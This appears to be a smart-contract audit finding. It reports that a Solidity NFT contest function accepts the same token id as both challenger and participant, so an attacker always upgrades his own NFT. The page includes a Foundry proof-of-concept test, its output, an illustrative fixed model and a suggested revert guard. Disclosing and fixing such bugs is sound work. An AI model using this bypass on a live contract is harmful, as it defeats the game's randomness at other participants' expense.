Submission Details
Severity: medium
Valid

### [H-4] Lack of input validation in `increaseValuesOfParticipants` function for `tokenIdOfChallenger` and `tokenIdOfAnyPerticipent`

[H-4] Lack of input validation in the `ChoosingRam::increaseValuesOfParticipants` function allows an attacker to win every time by submitting the same NFT id as both `tokenIdOfChallenger` and `tokenIdOfAnyPerticipent`.

Description: The `ChoosingRam::increaseValuesOfParticipants` function is supposed to update the characteristics of the challenger's NFT if the value of the `random` variable is 0; otherwise, it should update the characteristics of the NFT identified by `tokenIdOfAnyPerticipent`. Because no check enforces that `tokenIdOfAnyPerticipent` differs from `tokenIdOfChallenger`, a malicious user can pass the same id for both arguments. Both branches then update the same NFT, so he is guaranteed to update his NFT every time, irrespective of the value of `random`.

Impact: A user can guarantee the update of the characteristics of his NFT, irrespective of randomness.
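A minimal Foundry model of the issue described above, added here as an illustration and not taken from the audited project or the submission. `UpgradeModel`, its function names and the placeholder coin flip are assumptions; only the same-ids guard mirrors the mitigation this finding recommends.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical model of the pattern; not the audited ChoosingRam contract.
contract UpgradeModel {
    error UpgradeModel__SameIds();

    mapping(uint256 => uint256) public level; // upgrades received per token id

    // Vulnerable shape: the caller picks both ids and nothing forces them apart.
    function upgradeUnchecked(uint256 challengerId, uint256 otherId) external {
        _upgrade(challengerId, otherId);
    }

    // Hardened shape: the guard from the recommended mitigation.
    function upgradeChecked(uint256 challengerId, uint256 otherId) external {
        if (challengerId == otherId) revert UpgradeModel__SameIds();
        _upgrade(challengerId, otherId);
    }

    function _upgrade(uint256 challengerId, uint256 otherId) private {
        // Placeholder coin flip (assumption); it only selects which id is upgraded.
        uint256 random = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 2;
        if (random == 0) level[challengerId] += 1;
        else level[otherId] += 1;
    }
}

contract UpgradeModelTest is Test {
    UpgradeModel internal model = new UpgradeModel();

    // Identical ids: token 0 is upgraded on every call, whichever branch runs.
    function test_sameIdsAlwaysUpgradeWhenUnchecked() public {
        for (uint256 i = 1; i <= 5; i++) {
            model.upgradeUnchecked(0, 0);
            assertEq(model.level(0), i);
            vm.warp(block.timestamp + 1);
        }
    }

    // The guard rejects the call before any state changes.
    function test_sameIdsRevertWhenChecked() public {
        vm.expectRevert(UpgradeModel.UpgradeModel__SameIds.selector);
        model.upgradeChecked(0, 0);
        assertEq(model.level(0), 0);
    }
}
```

Run it with `forge test --match-contract UpgradeModelTest` in a Foundry project that has forge-std installed.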

Proof of Concept: Add the test below to the `Dussehra.t.sol` file.

```solidity
function test_lackInputValidation() public {
    // player1 joins the event
    vm.startPrank(player1);
    vm.deal(player1, 1 ether);
    dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
    vm.stopPrank();

    // player2 joins the event
    vm.startPrank(player2);
    vm.deal(player2, 1 ether);
    dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
    vm.stopPrank();

    // player1 passes token id 0 as both challenger and participant,
    // five times in a row, so token 0 is updated on every call
    vm.startPrank(player1);
    choosingRam.increaseValuesOfParticipants(0, 0);
    vm.warp(block.timestamp + 1);
    choosingRam.increaseValuesOfParticipants(0, 0);
    vm.warp(block.timestamp + 1);
    choosingRam.increaseValuesOfParticipants(0, 0);
    vm.warp(block.timestamp + 1);
    choosingRam.increaseValuesOfParticipants(0, 0);
    vm.warp(block.timestamp + 1);
    choosingRam.increaseValuesOfParticipants(0, 0);
    vm.stopPrank();

    // after five updates the last characteristic of token 0 is set
    assertEq(ramNFT.getCharacteristics(0).isSatyavaakyah, true);
    address chosenRam = choosingRam.selectedRam();
    console.log(chosenRam);
}
```

Test output

```
[PASS] test_lackInputValidation() (gas: 429894)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.77ms (701.47µs CPU time)
Ran 1 test suite in 13.37ms (2.77ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
```

Recommended mitigation: Add a check that reverts when `tokenIdOfAnyPerticipent` and `tokenIdOfChallenger` are the same.

function increaseValuesOfParticipants(
uint256 tokenIdOfChallenger,
uint256 tokenIdOfAnyPerticipent
) public RamIsNotSelected {
//..
//..
+ if (tokenIdOfChallenger == tokenIdOfAnyPerticipent) {
+ revert ChoosingRam__SameIds();
+ }
//..
//..
}
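
Review bot: `ChoosingRam__SameIds()` on the added `revert` line is not declared anywhere in the lines shown, so the change will not compile unless the patch also adds `error ChoosingRam__SameIds();` at contract level. The elided `//..` lines also hide where the guard sits relative to the rest of the body; it should be placed before any state update or randomness computation so the call fails early, and a test that expects this revert for equal ids would document the fix.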
Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Challenge themselves
